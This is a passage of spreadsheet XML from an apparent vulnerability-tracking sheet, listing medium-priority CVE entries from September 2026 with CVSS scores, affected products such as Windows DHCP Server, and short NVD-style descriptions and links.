t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L778" s="5" t="inlineStr" /><c r="M778" s="5" t="inlineStr" /><c r="N778" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O778" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P778" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q778" s="5" t="inlineStr" /><c r="R778" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S778" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T778" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t></is></c></row><row r="779"><c r="A779" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B779" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C779" s="5" t="inlineStr"><is><t>CVE-2026-77498</t></is></c><c r="D779" s="5" t="n"><v>7.5</v></c><c r="E779" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F779" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G779" s="5" t="inlineStr" /><c r="H779" s="5" t="n"><v>0.008</v></c><c r="I779" s="5" t="inlineStr" /><c r="J779" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K779" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L779" s="5" t="inlineStr" /><c r="M779" s="5" t="inlineStr" /><c r="N779" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O779" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P779" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q779" s="5" t="inlineStr" /><c r="R779" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S779" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T779" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t></is></c></row><row r="780"><c r="A780" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B780" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C780" s="5" t="inlineStr"><is><t>CVE-2026-77499</t></is></c><c r="D780" s="5" t="n"><v>7.5</v></c><c r="E780" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F780" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G780" s="5" t="inlineStr" /><c r="H780" s="5" t="n"><v>0.008999999999999999</v></c><c r="I780" s="5" t="inlineStr" /><c r="J780" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K780" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L780" s="5" t="inlineStr" /><c r="M780" s="5" t="inlineStr" /><c r="N780" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O780" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P780" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q780" s="5" t="inlineStr" /><c r="R780" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S780" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T780" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t></is></c></row><row r="781"><c r="A781" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B781" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C781" s="5" t="inlineStr"><is><t>CVE-2026-77501</t></is></c><c r="D781" s="5" t="n"><v>7.5</v></c><c r="E781" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F781" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G781" s="5" t="inlineStr" /><c r="H781" s="5" t="n"><v>0.008</v></c><c r="I781" s="5" t="inlineStr" /><c r="J781" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K781" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L781" s="5" t="inlineStr" /><c r="M781" s="5" t="inlineStr" /><c r="N781" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O781" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P781" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q781" s="5" t="inlineStr" /><c r="R781" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S781" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T781" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t></is></c></row><row r="782"><c r="A782" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B782" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C782" s="5" t="inlineStr"><is><t>CVE-2026-77502</t></is></c><c r="D782" s="5" t="n"><v>7.5</v></c><c r="E782" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F782" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G782" s="5" t="inlineStr" /><c r="H782" s="5" t="n"><v>0.008</v></c><c r="I782" s="5" t="inlineStr" /><c r="J782" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K782" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L782" s="5" t="inlineStr" /><c r="M782" s="5" t="inlineStr" /><c r="N782" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O782" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P782" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q782" s="5" t="inlineStr" /><c r="R782" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S782" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T782" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t></is></c></row><row r="783"><c r="A783" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B783" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C783" s="5" t="inlineStr"><is><t>CVE-2026-77886</t></is></c><c r="D783" s="5" t="n"><v>7.5</v></c><c r="E783" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F783" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G783" s="5" t="inlineStr" /><c r="H783" s="5" t="n"><v>0.008</v></c><c r="I783" s="5" t="inlineStr" /><c r="J783" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K783" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L783" s="5" t="inlineStr" /><c r="M783" s="5" t="inlineStr" /><c r="N783" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O783" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P783" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q783" s="5" t="inlineStr" /><c r="R783" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S783" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T783" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t></is></c></row><row r="784"><c r="A784" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B784" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C784" s="5" t="inlineStr"><is><t>CVE-2026-77888</t></is></c><c r="D784" s="5" t="n"><v>7.5</v></c><c r="E784" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F784" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G784" s="5" t="inlineStr" /><c r="H784" s="5" t="n"><v>0.008999999999999999</v></c><c r="I784" s="5" t="inlineStr" /><c r="J784" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K784" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L784" s="5" t="inlineStr" /><c r="M784" s="5" t="inlineStr" /><c r="N784" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O784" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P784" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q784" s="5" t="inlineStr" /><c r="R784" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S784" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T784" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t></is></c></row><row r="785"><c r="A785" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B785" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C785" s="5" t="inlineStr"><is><t>CVE-2026-77889</t></is></c><c r="D785" s="5" t="n"><v>7.5</v></c><c r="E785" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F785" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G785" s="5" t="inlineStr" /><c r="H785" s="5" t="n"><v>0.008999999999999999</v></c><c r="I785" s="5" t="inlineStr" /><c r="J785" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K785" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L785" s="5" t="inlineStr" /><c r="M785" s="5" t="inlineStr" /><c r="N785" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O785" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P785" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q785" s="5" t="inlineStr" /><c r="R785" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S785" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T785" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t></is></c></row><row r="786"><c r="A786" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B786" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C786" s="5" t="inlineStr"><is><t>CVE-2026-77890</t></is></c><c r="D786" s="5" t="n"><v>7.5</v></c><c r="E786" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F786" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G786" s="5" t="inlineStr" /><c r="H786" s="5" t="n"><v>0.008999999999999999</v></c><c r="I786" s="5" t="inlineStr" /><c r="J786" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K786" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L786" s="5" t="inlineStr" /><c r="M786" s="5" t="inlineStr" /><c r="N786" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O786" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P786" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q786" s="5" t="inlineStr" /><c r="R786" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S786" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T786" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t></is></c></row><row r="787"><c r="A787" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B787" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C787" s="5" t="inlineStr"><is><t>CVE-2026-77893</t></is></c><c r="D787" s="5" t="n"><v>7.5</v></c><c r="E787" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F787" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G787" s="5" t="inlineStr" /><c r="H787" s="5" t="n"><v>0.008</v></c><c r="I787" s="5" t="inlineStr" /><c r="J787" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K787" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L787" s="5" t="inlineStr" /><c r="M787" s="5" t="inlineStr" /><c r="N787" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O787" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P787" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q787" s="5" t="inlineStr" /><c r="R787" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S787" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T787" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t></is></c></row><row r="788"><c r="A788" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B788" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C788" s="5" t="inlineStr"><is><t>CVE-2026-77895</t></is></c><c r="D788" s="5" t="n"><v>7.5</v></c><c r="E788" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F788" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G788" s="5" t="inlineStr" /><c r="H788" s="5" t="n"><v>0.011</v></c><c r="I788" s="5" t="inlineStr" /><c r="J788" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K788" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L788" s="5" t="inlineStr" /><c r="M788" s="5" t="inlineStr" /><c r="N788" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O788" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P788" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q788" s="5" t="inlineStr" /><c r="R788" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S788" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T788" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t></is></c></row><row r="789"><c r="A789" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B789" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C789" s="5" t="inlineStr"><is><t>CVE-2026-77898</t></is></c><c r="D789" s="5" t="n"><v>7.5</v></c><c r="E789" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F789" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G789" s="5" t="inlineStr" /><c r="H789" s="5" t="n"><v>0.005</v></c><c r="I789" s="5" t="inlineStr" /><c r="J789" s="5" t="inlineStr" /><c r="K789" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L789" s="5" t="inlineStr" /><c r="M789" s="5" t="inlineStr" /><c r="N789" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O789" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P789" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q789" s="5" t="inlineStr" /><c r="R789" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S789" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T789" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t></is></c></row><row r="790"><c r="A790" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B790" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C790" s="5" t="inlineStr"><is><t>CVE-2026-78523</t></is></c><c r="D790" s="5" t="n"><v>7.5</v></c><c r="E790" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G790" s="5" t="inlineStr" /><c r="H790" s="5" t="n"><v>0.01</v></c><c r="I790" s="5" t="inlineStr" /><c r="J790" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K790" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L790" s="5" t="inlineStr" /><c r="M790" s="5" t="inlineStr" /><c r="N790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O790" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P790" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q790" s="5" t="inlineStr" /><c r="R790" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S790" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T790" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t></is></c></row><row r="791"><c r="A791" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B791" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C791" s="5" t="inlineStr"><is><t>CVE-2026-78574</t></is></c><c r="D791" s="5" t="n"><v>7.5</v></c><c r="E791" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F791" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G791" s="5" t="inlineStr" /><c r="H791" s="5" t="n"><v>0.001</v></c><c r="I791" s="5" t="inlineStr" /><c r="J791" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K791" s="5" t="inlineStr" /><c r="L791" s="5" t="inlineStr" /><c r="M791" s="5" t="inlineStr" /><c r="N791" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O791" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P791" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q791" s="5" t="inlineStr" /><c r="R791" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S791" s="5" t="inlineStr"><is><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is></c><c r="T791" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t></is></c></row><row r="792"><c r="A792" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B792" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C792" s="5" t="inlineStr"><is><t>CVE-2026-78837</t></is></c><c r="D792" s="5" t="n"><v>7.5</v></c><c r="E792" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F792" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G792" s="5" t="inlineStr" /><c r="H792" s="5" t="n"><v>0.003</v></c><c r="I792" s="5" t="inlineStr" /><c r="J792" s="5" t="inlineStr" /><c r="K792" s="5" t="inlineStr" /><c r="L792" s="5" t="inlineStr" /><c r="M792" s="5" t="inlineStr" /><c r="N792" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O792" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P792" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q792" s="5" t="inlineStr" /><c r="R792" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S792" s="5" t="inlineStr"><is><t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T792" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t></is></c></row><row r="793"><c r="A793" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B793" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C793" s="5" t="inlineStr"><is><t>CVE-2026-79377</t></is></c><c r="D793" s="5" t="n"><v>7.5</v></c><c r="E793" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F793" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G793" s="5" t="inlineStr" /><c r="H793" s="5" t="n"><v>0.004</v></c><c r="I793" s="5" t="inlineStr" /><c r="J793" s="5" t="inlineStr" /><c r="K793" s="5" t="inlineStr" /><c r="L793" s="5" t="inlineStr" /><c r="M793" s="5" t="inlineStr" /><c r="N793" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O793" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P793" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q793" s="5" t="inlineStr" /><c r="R793" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S793" s="5" t="inlineStr"><is><t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T793" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t></is></c></row><row r="794"><c r="A794" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B794" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C794" s="5" t="inlineStr"><is><t>CVE-2026-79378</t></is></c><c r="D794" s="5" t="n"><v>7.5</v></c><c r="E794" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F794" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G794" s="5" t="inlineStr" /><c r="H794" s="5" t="n"><v>0.004</v></c><c r="I794" s="5" t="inlineStr" /><c r="J794" s="5" t="inlineStr" /><c r="K794" s="5" t="inlineStr" /><c r="L794" s="5" t="inlineStr" /><c r="M794" s="5" t="inlineStr" /><c r="N794" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O794" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P794" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q794" s="5" t="inlineStr" /><c r="R794" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S794" s="5" t="inlineStr"><is><t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T794" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t></is></c></row><row r="795"><c r="A795" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B795" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C795" s="5" t="inlineStr"><is><t>CVE-2026-79572</t></is></c><c r="D795" s="5" t="n"><v>7.5</v></c><c r="E795" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F795" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G795" s="5" t="inlineStr" /><c r="H795" s="5" t="n"><v>0.003</v></c><c r="I795" s="5" t="inlineStr" /><c r="J795" s="5" t="inlineStr" /><c r="K795" s="5" t="inlineStr" /><c r="L795" s="5" t="inlineStr" /><c r="M795" s="5" t="inlineStr" /><c r="N795" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O795" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P795" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q795" s="5" t="inlineStr" /><c r="R795" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S795" s="5" t="inlineStr"><is><t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t></is></c><c r="T795" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t></is></c></row><row r="796"><c r="A796" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B796" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C796" s="5" t="inlineStr"><is><t>CVE-2026-79575</t></is></c><c r="D796" s="5" t="n"><v>7.5</v></c><c r="E796" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F796" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G796" s="5" t="inlineStr" /><c r="H796" s="5" t="n"><v>0.002</v></c><c r="I796" s="5" t="inlineStr" /><c r="J796" s="5" t="inlineStr" /><c r="K796" s="5" t="inlineStr" /><c r="L796" s="5" t="inlineStr" /><c r="M796" s="5" t="inlineStr" /><c r="N796" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O796" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P796" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q796" s="5" t="inlineStr" /><c r="R796" s="5" t="inlineStr"><is><t>CWE-330</t></is></c><c r="S796" s="5" t="inlineStr"><is><t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t></is></c><c r="T796" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t></is></c></row><row r="797"><c r="A797" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B797" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C797" s="5" t="inlineStr"><is><t>CVE-2026-81355</t></is></c><c r="D797" s="5" t="n"><v>7.5</v></c><c r="E797" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F797" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G797" s="5" t="inlineStr" /><c r="H797" s="5" t="n"><v>0.002</v></c><c r="I797" s="5" t="inlineStr" /><c r="J797" s="5" t="inlineStr" /><c r="K797" s="5" t="inlineStr" /><c r="L797" s="5" t="inlineStr" /><c r="M797" s="5" t="inlineStr" /><c r="N797" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O797" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P797" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q797" s="5" t="inlineStr" /><c r="R797" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S797" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t></is></c><c r="T797" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t></is></c></row><row r="798"><c r="A798" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B798" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C798" s="5" t="inlineStr"><is><t>CVE-2026-81381</t></is></c><c r="D798" s="5" t="n"><v>7.5</v></c><c r="E798" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G798" s="5" t="inlineStr" /><c r="H798" s="5" t="n"><v>0.006</v></c><c r="I798" s="5" t="inlineStr" /><c r="J798" s="5" t="inlineStr" /><c r="K798" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L798" s="5" t="inlineStr" /><c r="M798" s="5" t="inlineStr" /><c r="N798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O798" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P798" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q798" s="5" t="inlineStr" /><c r="R798" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S798" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c 